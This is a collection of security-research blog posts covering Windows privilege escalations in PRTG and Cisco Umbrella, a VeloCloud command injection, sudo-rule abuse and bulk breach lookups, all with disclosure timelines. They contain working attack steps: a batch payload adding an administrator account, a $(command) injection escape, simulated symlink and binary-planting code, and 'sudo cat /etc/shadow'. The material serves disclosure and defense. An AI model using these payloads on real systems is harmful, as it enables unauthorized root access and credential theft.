PRTG Network Monitor Privilege Escalation

Background:
Recently I've seen a decent number of privilege escalations on Windows stemming from permission issues and the use of symlinks. The work by Ryan Hanson of Atredis on the Cylance privilege escalation and the Windows Standard Collector privilege escalation really inspired me to research this issue further and potentially find some myself.

After several weeks of researching the usage of symlinks, hardlinks, and junctions on Windows (mostly provided by James Forshaw at Google’s Project Zero), I felt as if I had a basic understanding of the attack vector used. So, the next question was where do I start looking for my own privilege escalation using symlinks?

The answer to that was rather simple. While reviewing some past findings from another researcher, Codewatch, I came across this PRTG Network Monitor tool and was surprised that the web application was running processes as SYSTEM. So the logical next step was to download the tool and see what I could break!

Versions Tested:
18.2.41.1652

CVE Numbers:
CVE-2018-17887

Security Advisories:
None

Issue:
Upon downloading the software, the first thing I did (since my goal was to find issues where symlinks could be leveraged) was to monitor the services running using Procmon.exe. To my surprise, I found several instances where I could use symlinks to gain system-level privileges! What luck, right?

The issue stems from a service named "PRTG Probe Service." One of the actions taken by this service is to write logs under the notorious C:\ProgramData directory.

Side note: the ProgramData directory seems to get a lot of vendors in trouble, so extra attention should be paid to permissions in that location.

In total, there are four directories written to by the "PRTG Probe Service" as SYSTEM; one of them is shown below in Figure 1.

Figure 1: Vulnerable Log Files

The other directories are:
• C:\ProgramData\Paessler\PRTG Network Monitor\Logs (Debug)
• C:\ProgramData\Paessler\PRTG Network Monitor\Logs (Sensors)
• C:\ProgramData\Paessler\PRTG Network Monitor\Logs (System)
• C:\ProgramData\Paessler\PRTG Network Monitor\Logs (Web Server)

The issue isn't actually the symlink; it's the access rights assigned to those files, as seen in Figure 2. For some odd reason, PRTG designed the application to create these log files with absolutely zero permissions assigned!

Figure 2: Permissions for log files

Because no rights are assigned to those log files, a low-level (non-privileged) user can do the following, which is explained in greater detail in the “Proof of Concept” section:

  • Delete all files in the "C:\ProgramData\Paessler\PRTG Network Monitor\Logs*" directories.
  • Create a symlink from any of the log files, redirecting it to a new directory. Using RPC, we can rename the file along the way (this happens as SYSTEM, since the service creates the file).
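The two steps can be sketched as a simulation on a generic filesystem. This is a hedged illustration only: it uses a plain POSIX symlink and temporary directories standing in for the real paths, whereas the actual attack used Windows symlink tricks plus an RPC rename against the SYSTEM service.

```python
import os
import tempfile

# Temporary stand-ins for the two directories involved (illustrative only).
logs_dir = tempfile.mkdtemp()   # plays the "Logs (System)" directory
exe_dir = tempfile.mkdtemp()    # plays the "Notifications\EXE" directory

# Step 1: the low-privileged user clears the log directory (possible because
# the log files carry no protective ACL).
log_name = os.path.join(logs_dir, "PRTG Probe Log (1).log")

# Step 2: the log file's name now points into the privileged directory.
os.symlink(os.path.join(exe_dir, "exploit.bat"), log_name)

# When the SYSTEM service next "writes its log", the bytes land in exploit.bat.
with open(log_name, "w") as f:
    f.write("written by the service as SYSTEM")

planted = os.path.join(exe_dir, "exploit.bat")
print(os.path.exists(planted))  # the redirected file now exists in the target dir
```

The point of the sketch is only the redirection mechanic: the privileged writer opens a name it trusts, and the link makes that name resolve somewhere the attacker chose.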

The steps above allowed me to redirect one log file to the "C:\Program Files (x86)\PRTG Network Monitor\Notifications\EXE" directory and rename it to exploit.bat. The batch script created a new user and added that user to the Administrators group.
One thing to note: I didn't need to create the exploit.bat file to gain escalated privileges. I could have dropped a DLL where one was missing and performed DLL hijacking or binary planting. I did it this way because I was interested in seeing how the notifications job worked.
The below proof of concept shows one way of exploiting this issue along with a video showing a different log file being leveraged for exploitation.

Proof of Concept:
The first step in the attack is to remove all files from the "C:\ProgramData\Paessler\PRTG Network Monitor\Logs*" directories as a low-level user. In the Figure 3 example below, I used the "C:\ProgramData\Paessler\PRTG Network Monitor\Logs (System)" directory.

Figure 3: Deleting files from the target directory

We then create a symlink from our target directory to a new location and use an RPC call to rename the file. In Figure 4, we take the file "PRTG Probe Log (1).log" and move it to "C:\Program Files (x86)\PRTG Network Monitor\Notifications\EXE\exploit.bat". Files within that directory can be executed from the web application through notifications with SYSTEM privileges. We could instead have moved this file to a location where the program looked for a DLL that did not exist and performed DLL hijacking.

Figure 4: Showing user rights and creation of symlink

After the symlink was created, we restarted the service (as admin, just for ease of testing). Alternatively, in the directory "C:\ProgramData\Paessler\PRTG Network Monitor\Logs (Web Server)" we can create a symlink with that log file and then simply browse to the web page; the program then attempts to write to the web server log file, which is our symlink, as seen in Figure 5.

Figure 5: Showing the usage of Web Server log instead of restarting service

In Figure 6, we show that the file exploit.bat did not exist prior to exploitation and that files within that directory are not editable by low-level users.

Figure 6: Contents of EXE directory and rights of files within

After restarting the service, we see that the symlink is followed by the service: exploit.bat is created, and the rights on that file allow any user on the system to edit it, as seen in Figure 7.

Figure 7: Proof exploit.bat was created and the rights for that file

As a low-level user, we added malicious code to exploit.bat (as seen in Figure 8) that, upon execution, adds a local administrator account.

Figure 8: Code within exploit.bat
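A stand-in sketch of that step follows. The account name and password are purely illustrative (Figure 8 shows the real content), and a temporary file plays the part of the world-writable exploit.bat:

```python
import os
import tempfile

# Temporary stand-in for the exploit.bat that the service created with an ACL
# letting any user modify it.
exploit_bat = os.path.join(tempfile.mkdtemp(), "exploit.bat")
open(exploit_bat, "w").close()

# Payload appended by the low-privileged user: create an account and make it
# a local administrator (name and password here are illustrative).
payload = ("net user pwn Sup3rS3cret! /add\r\n"
           "net localgroup Administrators pwn /add\r\n")
with open(exploit_bat, "a") as f:
    f.write(payload)

print(open(exploit_bat).read())
```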

Figure 9 shows the accounts that exist on the victim machine prior to exploitation.

Figure 9: Accounts that exist prior to exploit

Finally, due to my curiosity, we created a notification in the Web-GUI (as seen in Figure 10) and used the “execute notification” feature to force the execution of the exploit.bat program.

Figure 10: Creation of the notification job

Upon execution, we can see in Figure 11 that our wonderful user “pwn” was created and added as a local administrator!

Figure 11: Pwnage!

We have also added a script to exploit this issue on our GitHub page.

Other Info:
Concerned about the successful privilege escalation, I disclosed the issue to the vendor, Paessler, in July, but unfortunately they did not consider it a security issue (see Figure 12) and, to my knowledge, have not informed their clients of the risk. I have since validated that a patch for this issue was created and released, though I am not sure when. I am now releasing this information in the public interest, so end users can take preventative actions.

Figure 12: Email from PRTG

Timeline:
2018-07-08 – Vendor Disclosure.
2018-07-09 – Vendor Responded Claiming No Security Issue.
2018-07-09 – Responded back to the vendor with further details and public info on why it is an issue. Vendor didn’t respond.
2018-07-13 – Emailed vendor to check status. Vendor didn’t respond.
2018-09-20 – Confirmed vendor fixed the security issue. Vendor still hasn’t responded.
2018-10-03 – Public Release.

Discovered by Quentin (Paragonsec) Rhoads-Herrera | TEAMARES
October 3, 2018

Cisco Umbrella Enterprise Roaming Client and Enterprise Roaming Module Privilege Escalation Vulnerability

CVE Numbers:
CVE-2018-0437 – Cisco Umbrella ERC releases prior to 2.1.118 and Cisco Umbrella
CVE-2018-0438 – Cisco Umbrella ERC releases prior to 2.1.127

Versions Tested:
Umbrella Roaming Client 2.0.168

Security Advisories:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-priv
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-file-read

Binary Planting:
The Umbrella Roaming Client from Cisco OpenDNS includes a service named Umbrella_RC which is executed as SYSTEM on startup. This service consumes several files within the C:\ProgramData\OpenDNS\* directory, which possesses the user rights shown in Figure 1.

Figure 1: User Rights

According to Microsoft, local users have the ability to write data to the above-referenced directory, which by default isn't a security vulnerability. However, what happens if the service requests files that don't exist within this directory?

Like DLL Hijacking, Binary Planting is a vulnerability in which a malicious user places a binary file containing exploit code in a location where an application or service will execute it. This is exactly what happened in this example.

The service looks for two Windows binaries in a non-standard path, as seen in Figures 2 and 3, before finding them in the Windows System directory, allowing us to perform a "Binary Planting" exploitation:

  • C:\ProgramData\OpenDNS\ERC\cmd.exe
  • C:\ProgramData\OpenDNS\ERC\netsh.exe

Figure 2: CMD.exe Lookup by ERCService.exe
Figure 3: NETSH.exe Lookup by ERCService.exe
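The hijack works purely because of the lookup order. A hedged Python sketch of that search logic, with temporary directories standing in for the real paths:

```python
import os
import tempfile

def find_binary(name, search_dirs):
    """Return the first existing copy of `name` along the search order."""
    for d in search_dirs:
        candidate = os.path.join(d, name)
        if os.path.exists(candidate):
            return candidate
    return None

erc_dir = tempfile.mkdtemp()     # plays C:\ProgramData\OpenDNS\ERC (user-writable)
system_dir = tempfile.mkdtemp()  # plays the protected Windows System directory

# Normally only the legitimate binary exists, in the system directory.
open(os.path.join(system_dir, "cmd.exe"), "w").close()
assert find_binary("cmd.exe", [erc_dir, system_dir]) == os.path.join(system_dir, "cmd.exe")

# A low-privileged user plants a malicious copy in the first directory searched,
# and the lookup now resolves to the planted binary instead.
open(os.path.join(erc_dir, "cmd.exe"), "w").close()
assert find_binary("cmd.exe", [erc_dir, system_dir]) == os.path.join(erc_dir, "cmd.exe")
```

Because the user-writable directory comes first in the order, the service executes the attacker's copy as SYSTEM without any permission being violated along the way.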

For our example, we are going to generate two executables that would add a user, add that user to the administrator's group, and then write a file to C:\. As shown in Figure 4, we are using a low-level user to perform these actions.

Figure 4: Local Low-Level User

Proof-of-Concept (POC) CODE:

We compile the above POC code using Visual Studio, as seen in Figure 5. In this example, I compiled two different binaries that add the users "pwnage1" and "pwnage2".

Figure 5: Compiling exploit code

Now with the exploit code compiled, we need to move it over to the directory C:\ProgramData\OpenDNS\ERC, as seen in Figure 6:

Figure 6: Moving our binaries

Now we can either restart our machine or be lazy and restart the service as an admin user; either way yields the same result: a new admin user and a file written to C:\, as seen in Figures 7-9:

Figure 7: User from malicious netsh.exe binary

Figure 8: User from malicious cmd.exe binary

Figure 9: Files written in C:\ from malicious netsh.exe and cmd.exe binaries

MSI Planting:

Following the same trend as the above Binary Planting issue, the OpenDNS application also looks for an MSI for upgrading purposes as seen in Figure 10. However, just like above, this MSI is being searched for in a directory that a local low-level user has write access to, as seen in Figure 11.

Figure 10: MSI Lookup

Figure 11: User writes

In order to exploit this, we are going to use a trial version of the software "Advanced Installer" to create an MSI containing malicious code. Within the MSI we are going to create two scheduled tasks that do the following, as seen in Figure 12:

  • Create a local user
  • Add that user to the administrator’s group

Figure 12: MSI Containing the scheduled tasks

After generating the MSI, we move it to the directory the service searches, as seen in Figure 13.

Figure 13: Moving MSI as a low-level user

As before, we can either restart the machine or restart the service as admin to prove our point. Either way, the service will find and execute the MSI, write a log file showing the MSI was executed, and then delete it.

Once executed, the scheduled tasks within the MSI will be created, as seen in Figure 14.

Figure 14: Scheduled tasks created

Once these tasks are executed, the user "pwn" (or whatever cool name you give it) will be created and added to the administrator's group, as seen in Figure 15.

Figure 15: User pwn created

Log file from MSI execution by ERCService.exe:

Timeline:

2018-05-12 – Vendor Disclosure

2018-05-16 – Vendor Confirmed Vulnerabilities

2018-09-05 – Public Release

Credit:

Discovered by Quentin (Paragonsec) Rhoads-Herrera | TEAMARES
September 5, 2018

Defending Layer 8

Security awareness training is broken. Read the news any day of the week and you can find articles about breaches, ransomware attacks, and countless records stolen, resulting in identity theft victims. Our users continue to click suspicious links, open attachments they weren't expecting, and fall for the call to action. Attackers know that our users are the weakest link in the security chain.

In 2014, Gartner calculated the market space for security awareness training at $1 billion with double-digit annual growth. Gartner predicts the market will reach $10 billion sometime between 2024 and 2027. With the rapid increase in security awareness training spend, why are we continuing to see so many breaches? What are we missing in effective security awareness programs?

1. Executive Buy-in

I recently presented on security awareness at a local trade show and found that only about 30% of organizations had some type of executive buy-in for their security awareness program. For as many companies as claim cybersecurity is a priority, why such a low percentage of support from the C-suite?

Get your executives to promote the security awareness program and encourage all employees to participate. Without the official nod of approval, we find ourselves with limited traction in the organization.

2.  Meaningful Metrics

Metrics and Key Performance Indicators are among the missing or poorly set-up components of a security awareness program. Metrics for security awareness usually look like:

  • How many people took the training?
  • How quickly did people complete the training?
  • How many people passed/failed the quiz at the end of the training module?

When you were in grade school, you didn't get a grade on your assignment based on the number of questions completed or whether you turned in the piece of paper. You were graded on the number of questions answered correctly! Your grade was based on the output of your learning, not the input. Too many times we see security awareness programs set up to measure the inputs and not the resultant output behavior. So, what's an example of an output metric?

  • Number of reported phishing messages
  • Increase/decrease in the number of security incidents
  • Decrease in security incidents by poorly performing individuals/departments after completing training
  • Incident avoidance rate

With the incident avoidance metric, take the estimated cost for downtime and convert it to an hourly rate. The hourly rate should be multiplied by the average number of hours of downtime for an individual or department during a cybersecurity incident. Track the number of cybersecurity incidents your organization responds to on a monthly and annual basis. Once the incident avoidance rate exceeds your annual spend on security awareness training, you’ve just offset the cost of your training program! This is an excellent way of quantifying the effectiveness of your security awareness program.
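A worked example of the arithmetic described above (all figures are invented for illustration, not benchmarks):

```python
def incident_avoidance_value(hourly_downtime_cost, avg_downtime_hours, incidents_avoided):
    """Estimated cost of the incidents that training helped the organization avoid."""
    return hourly_downtime_cost * avg_downtime_hours * incidents_avoided

annual_training_spend = 50_000   # illustrative annual awareness budget

# Say downtime costs $2,000/hour, an incident averages 8 hours of downtime,
# and tracking shows 4 fewer incidents this year than the historical baseline.
avoided = incident_avoidance_value(hourly_downtime_cost=2_000,
                                   avg_downtime_hours=8,
                                   incidents_avoided=4)
print(avoided)                           # dollar value of avoided downtime
print(avoided >= annual_training_spend)  # the program has offset its own cost
```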

Step 1: Create metrics

Step 2: ???

Step 3: Profit!

3.  Active Learning

Make it fun. Make it engaging. Make it memorable. The worst type of training is a boring PowerPoint with narration. Edgar Dale, an American educator who developed the Cone of Experience, tells us that only 10-30% of what we see and hear, also known as passive learning, is actually remembered. 70-90% of your security awareness spend is wasted with passive learning techniques!

When we engage active learning techniques, like using quizzes during training, phishing simulations, tabletop exercises, or having employees present about their security awareness experiences during a company lunch and learn, the percentage of recall jumps to 70-90%! An amazing increase in effectiveness with just a small change.

4.  Distributed Practice

A 1978 study, “The Influence of Length and Frequency of Training Sessions on the Rate of Learning to Type”, showed that postal workers were able to learn how to more effectively use a new typewriter system faster when the practice was spaced instead of when a longer instruction session was given. We can exploit this method of learning by giving shorter periods of security awareness training spread throughout the year. In today’s age of constant interruptions from push notifications, emails, phone calls, and your boss stopping by the cubicle to see how things are going, it’s hard to dedicate an extended period of time to anything. Breaking training into 15-30 minute easily understandable topics is a quick win to get training completed.

With distributed practice, we also need to space our phishing simulations. Set up a schedule with intervals randomized from every 3 to 7 weeks. With a predictable schedule, users are on the lookout for a phishing campaign. Using the same template, or a limited group of templates, results in the prairie dog effect: once a single user spots the phishing test, they notify their friends and coworkers what to be on the lookout for, skewing the metrics for the test.
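One way such a randomized schedule could be generated (a sketch; only the 3-to-7-week interval comes from the advice above, everything else is illustrative):

```python
import random
from datetime import date, timedelta

def phishing_schedule(start, campaigns, rng=random):
    """Launch dates spaced a random 3-7 weeks apart so users can't predict them."""
    dates, when = [], start
    for _ in range(campaigns):
        when = when + timedelta(weeks=rng.randint(3, 7))
        dates.append(when)
    return dates

# Four unpredictable campaign dates for the rest of the year.
for d in phishing_schedule(date(2018, 8, 15), 4):
    print(d)
```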

5.  Don’t Focus on Just the Phish

While phishing is the most prominent and publicized means of attacking the user, other avenues are gaining in popularity and effectiveness. USB Drops, Voice phishing (Vishing), SMS Phishing (SMShing), and physically accessing a location are additional ways for an attacker to load malware, get a user to give up their password, or find one written on a sticky note under the keyboard (or taped to the side of the monitor). Physical security is often left out of the curriculum, and goes untested by security groups, as our penetration testers have strolled through hallways unchallenged.

Ensure user awareness programs educate them on the dangers of devices found on the ground and enable them to challenge unknown callers asking for sensitive information or unfamiliar employees without a badge or escort. Many user awareness products include pieces for testing a user's susceptibility to dropped USB sticks, but never underestimate the insight gained by calling the helpdesk or having a friend try to walk in and grab a seat at an unoccupied desk. (See #3: this is the best active learning technique!)

In closing, set up meaningful metrics tracking the output of the security awareness program. Implement changes and track their effectiveness. Engage your users with more meaningful content and active learning techniques, and watch the effectiveness of your security awareness program increase.

by Brendan Dalpe | Senior Security Consultant
August 15, 2018

Unauthenticated Command Injection Vulnerability in VMware NSX SD-WAN by VeloCloud

Exploits for network devices including routers, switches, and firewalls have been around for as long as networking has been a thing. It seems like every week a researcher discloses a new vulnerability or publishes proof of concept (PoC) code online for these types of devices, and that is exactly what is happening in this article. Today, we walk through the discovery of an unauthenticated command injection vulnerability discovered by myself and the TEAMARES penetration testing team during a recent engagement.

We began our reconnaissance by probing external IPs and we quickly stumbled upon an NSX SD-WAN by VeloCloud that was quite interesting. The device required no authentication to access the web UI and disclosed sensitive information such as internal IP addresses. Diving further into the device we found that it has a nice diagnostics functionality that allows users to troubleshoot network connectivity and retrieve other metrics directly from the device. Naturally, the team decided to test the device to see if it could be exploited as an initial entry point to pivot into the organization’s internal network from the WAN.

After identifying a potential pivot point, we started by researching the device to see if any vulnerabilities had been announced by the vendor or if anyone had published exploit/PoC code online. The device being targeted was updated to the latest version (3.1.1), which patched the existing vulnerabilities announced by VMware. No PoC code or exploits existed for version 3.1.1 yet, so we set out to find a new vulnerability in the device and create an exploit that would allow us to breach our target.

Redirecting our attention back to the previously mentioned diagnostic functions, we first targeted the Traceroute tool, since the input field would accept either an IP address or a hostname, with the thought that since the field would accept both, it might be easier to break out of due to less strict sanitization of user input.

Figure 1 – Screenshot of the Traceroute Diagnostic Function

The team's assumption here was that the user input would be passed to the underlying operating system as a command to perform a traceroute. Since many network appliances run on some sort of embedded Linux, we worked towards breaking out of this command using Linux-friendly escapes to inject malicious commands. Once the proper escape characters, $(<COMMAND>), were identified, the HTTP request was loaded into Burp Suite's Repeater. Success.

Figure 2 – HTTP Request in Burp Suite Containing PoC Exploit

In the screenshot above you can see that the code is being injected just after the IP address. The code executes the Linux command "id" (which prints information about the current user) and returns the output of the command to a server under our control via a netcat connection. On the receiving end, a netcat listener was opened prior to submitting the POST request to catch the output.

Figure 3 – Output of ‘id’ Command Returned to a netcat Listener

From this output, we learned that commands were being executed as the user “root”. Perfect. This code is just a quick PoC to show that it was vulnerable and exploitable. Since these commands are running as root, the possibilities are endless, and a malicious actor would have complete control of the device at this point.

But Why Did This Work?

After investigating the code running on the device itself, we discovered that the utilities and scripts were written in the Lua language. Lua is a powerful language in the hands of experienced programmers, yet approachable for less experienced ones. While researching vulnerabilities and exploits for systems with components written in Lua, we found a write-up on seclists.org with great examples that thoroughly explained the vulnerabilities and how to exploit them, including vulnerable code samples (Link: http://seclists.org/fulldisclosure/2014/May/128).

From the seclists write up:

“OS COMMAND INJECTION

OS command injection flaws (CWE-78) allow attackers to run arbitrary commands on the remote server. Because a command injection vulnerability may lead to compromise of the server hosting the web application, it is often considered a very serious flaw. In Lua, this kind of vulnerability occurs, for example, when a developer uses unvalidated user data to run operating system commands via the os.execute() or io.popen() Lua functions.”

In the example code following the description above, a reader can clearly see where the injection point exists: the call to the os.execute Lua function.

Vulnerable code examples:
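The vulnerable pattern is the classic concatenation of user input into a shell command. The same shape is sketched below in Python for the sake of a runnable example (the Lua version in the write-up simply uses os.execute or io.popen in place of subprocess.run; `echo` stands in for the real traceroute so the sketch runs anywhere):

```python
import subprocess

def traceroute(host):
    # Vulnerable: user input is concatenated, unvalidated, into a shell
    # command, exactly the CWE-78 pattern described above.
    cmd = "echo tracing " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

print(traceroute("1.1.1.1"))        # normal use: "tracing 1.1.1.1"
print(traceroute("1.1.1.1 $(id)"))  # $(id) runs before echo ever sees its arguments
```

The fix is equally classic: validate the input against the narrow set of legal values (an IP address or hostname), or pass it as a discrete argument rather than through a shell.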

Reporting and Patching

VMware has released a patch to address this vulnerability. Remediation actions required for affected devices include updating to version 3.1.2. Details can be found in the VMware Security Advisory VMSA-2018-011.1.

CyberOne’s TEAMARES penetration testing team followed responsible disclosure procedure by submitting the vulnerability to VMware’s Security Response Center, and waiting for a patch to be released for the affected devices before publishing any information. The vulnerability was also disclosed independently to VMware by security researcher Brian Sullivan from Tevora.

Fall of Sudo – A Pwnage Collection

Introduction

Finding Linux servers heavily reliant on Sudo rules for daily management tasks is a common occurrence. While not necessarily bad, Sudo rules can quickly become security’s worst nightmare. Before discussing the security implications, let’s first discuss what Sudo is.

Defining Sudo

What is Sudo? Sudo, which stands for "superuser do," is a program that allows a user to execute commands as other users, most commonly as root, the "administrator" equivalent for Linux operating systems; think "runas" for Windows. Sudo enables the implementation of the least-privilege model, in which users are only given rights to run certain elevated commands based on what's necessary to complete their job. Without Sudo, we would need to log into the server or desktop as root to perform an update, change network settings, remove users, or perform any other privileged task. Nothing bad could come from that, right?

A Brief Education of Sudo

This post isn't about how Sudo is a bad program, but about Sudo's common misconfigurations. Some Linux shops use LDAP to centralize Sudo rules for their machines, but the file /etc/sudoers is the standard method of management. This file may look intimidating, but for the sake of this post, we are only going to talk about how users are assigned rules.

#
# This file MUST be edited with the ‘visudo’ command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path=”/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin”
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
paragonsec ALL=(ALL:ALL) /bin/cat
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on “#include” directives:
#includedir /etc/sudoers.d

/etc/sudoers file example

The user privilege lines in the above example are what will be discussed in this post. They control which users can run Sudo and what programs they can run. Multiple entries can exist per user to facilitate running different programs under different user contexts depending on requirements. The format of a basic user Sudo rule is the following:

<user>   <host>=(<user run as>:<group run as>) <command>

In the above /etc/sudoers file, we see the user "paragonsec" has the rule "ALL=(ALL:ALL) /bin/cat". This grants the user "paragonsec" the ability to execute /bin/cat with Sudo on any host, as any user, as any group. While this might not seem like a terrible thing, we can use /bin/cat's functionality to print out any file on the system as root. Maybe something like /etc/shadow.
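The rule format lends itself to automated auditing, which is the idea behind tools like Fall of Sudo. A minimal sketch (the regex covers only the simple single-command rule shape shown above, and the abuse hints are illustrative):

```python
import re

# <user> <host>=(<runas user>:<runas group>) <command>  -- simple rules only
RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s+(?P<cmd>\S+)$")

# Commands whose ordinary behaviour already hands over root-level access.
ABUSABLE = {
    "/bin/cat": "sudo /bin/cat /etc/shadow  # dump password hashes",
    "/bin/bash": "sudo /bin/bash            # instant root shell",
}

def audit(rule_line):
    """Return an abuse hint if the rule grants an easily leveraged command."""
    m = RULE.match(rule_line.strip())
    return ABUSABLE.get(m.group("cmd")) if m else None

print(audit("paragonsec ALL=(ALL:ALL) /bin/cat"))
```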

The Problem with Sudo

With basic knowledge of Sudo and /etc/sudoers, the hunt for vulnerabilities is on. During engagements, I consistently see two scenarios as they relate to Sudo rules.

  1. A complete lack of configuration where the Sudo rules don’t follow the least privilege model and allow for many users to execute commands as root.
  2. A relatively secure set of Sudo rules, but the command assigned is a rarely used argument that allows the execution of shell commands.

Either way, Sudo has the potential to provide many opportunities to elevate your privileges in Linux, and often abusing Sudo rules is the quickest way to gain root privileges.

One might quickly point a finger at the Linux administrators for this oversight, but they aren’t the only culprits. Time and time again I come across routers, switches, cloud servers, and more that come with weak Sudo rules. The usual argument for this is “the user is an admin and should have the ability to execute commands as root.” If that’s the case, let’s just say “Root for everyone!”

This isn’t a reasonable option, so we need a way to secure Sudo. The best way to secure anything is to know how it can be abused by testing it, and for this, we now have Fall of Sudo.

Fall of Sudo

During an engagement leveraging these rules I thought, "How could I keep a record of all the insane wizardry of Sudo privilege escalations I have seen people use?" The solution: "Fall of Sudo," a script compiling a collection of Sudo rule privilege escalations I have either found by reading man pages or picked up from Linux gurus.
The purpose of this tool is to teach red teamers and blue teamers various ways to leverage Sudo rules on commands ranging from bash to rsync to gain root!

Currently, two features exist:

  • information feature – This queries your current user's Sudo rules and displays rules that could be leveraged to gain root. Upon selection, the rule will be presented with an l33t printout showing which commands to execute in order to exploit the rule.

Output showing how /bin/cat can be abused to get the contents of /etc/shadow

  • “autopwn” feature – This was created for one reason… to anger a certain Linux Wizard I know! If you know what you are doing, and have READ THE SCRIPT, then, by all means, make your life easier and just autopwn those Sudo rules.

Showing the ALL/ALL being abused to get root

It is important to note that I have not added extended rule support (e.g. /bin/sed s/test/woot/g notarealfile). I highly suggest you use the information functionality, so you can adjust the pwnage to your needs, and always test the rules in a controlled environment.

Is this it? Absolutely not! I plan on taking others’ input and expertise to add more Sudo rules as they become available. Version two is currently being planned, and thus far I have the following as possible additions:

  • Added module support
  • Addition of a learning function that shows and explains the exact issue with the Sudo rule
  • Support for expanded rules
  • Support for Sudo environment variables
  • Creation of a VM that would allow hands-on pwnage of varying Sudo rules

How You Can Help

I envision this growing even further to help red teamers, blue teamers, and Linux admins. I recognize that I am not the leading expert on Linux by any means, and this is where the community comes in. If you care to help grow this project, please open an issue on GitHub and share your ideas!

by Quentin Rhoads-Herrera | Offensive Security Manager
May 21, 2018

Finding Enterprise Credentials in Data Breaches

In the age of the breach, it's a safe assumption that almost every public account's credentials have been exposed at some point. "Have I Been Pwned" (HIBP) is a database that contains usernames and other information about any compromise they come across. While available for individuals to search against, certain protections have been put in place to prevent DDoS attacks, making mass scanning using their public API difficult.

As a red teamer, this information is very valuable during the passive reconnaissance phase of an engagement, and querying a single email at a time doesn't scale well against an organization of 10,000 users. While many applications and scripts have been written and shared using the API, there wasn't one available that successfully scans through an entire list of emails.

HIBP leverages CloudFlare as a web application firewall (WAF) that enforces brute-force protection through the use of two user-agent-based cookies and rate-limiting. To circumvent these controls, the script first reaches out to CloudFlare using a pre-set user agent and obtains the authentication cookies via an open-source project known as cloudflare-scrape (cfscrape). The script then utilizes the obtained cookies and a built-in 2-second delay between queries to conform to the rate limit.

The script can identify whether a specific email address has been breached according to HIBP, obtain any paste information if present, search or obtain a list of breaches, and download a copy of all breaches contained within HIBP.
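A simplified core loop for such a scanner might look like the sketch below. It is a hedged illustration: the real script also negotiates the CloudFlare cookies via cfscrape, the endpoint shown is the v2 API current at the time of writing, and the user-agent string is made up.

```python
import time
import urllib.request

API = "https://haveibeenpwned.com/api/v2/breachedaccount/{}"

def check_emails(emails, delay=2.0, opener=urllib.request.urlopen):
    """Query HIBP for each address, sleeping `delay` seconds between requests
    to respect the rate limit. `opener` is injectable so the loop is testable
    without network access."""
    results = {}
    for i, email in enumerate(emails):
        if i:
            time.sleep(delay)
        req = urllib.request.Request(API.format(email),
                                     headers={"User-Agent": "breach-checker"})
        try:
            with opener(req) as resp:
                results[email] = resp.read()
        except Exception:
            results[email] = None  # HIBP answers 404 for unbreached accounts
    return results
```

Feeding the function a file of addresses, one per line, then turns a 10,000-user sweep into a single (slow, rate-limit-respecting) run.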

Example of searching emails for potential breaches and obtaining pastes if they exist within HIBP database

by Quentin Rhoads-Herrera | Offensive Security Manager
May 1, 2018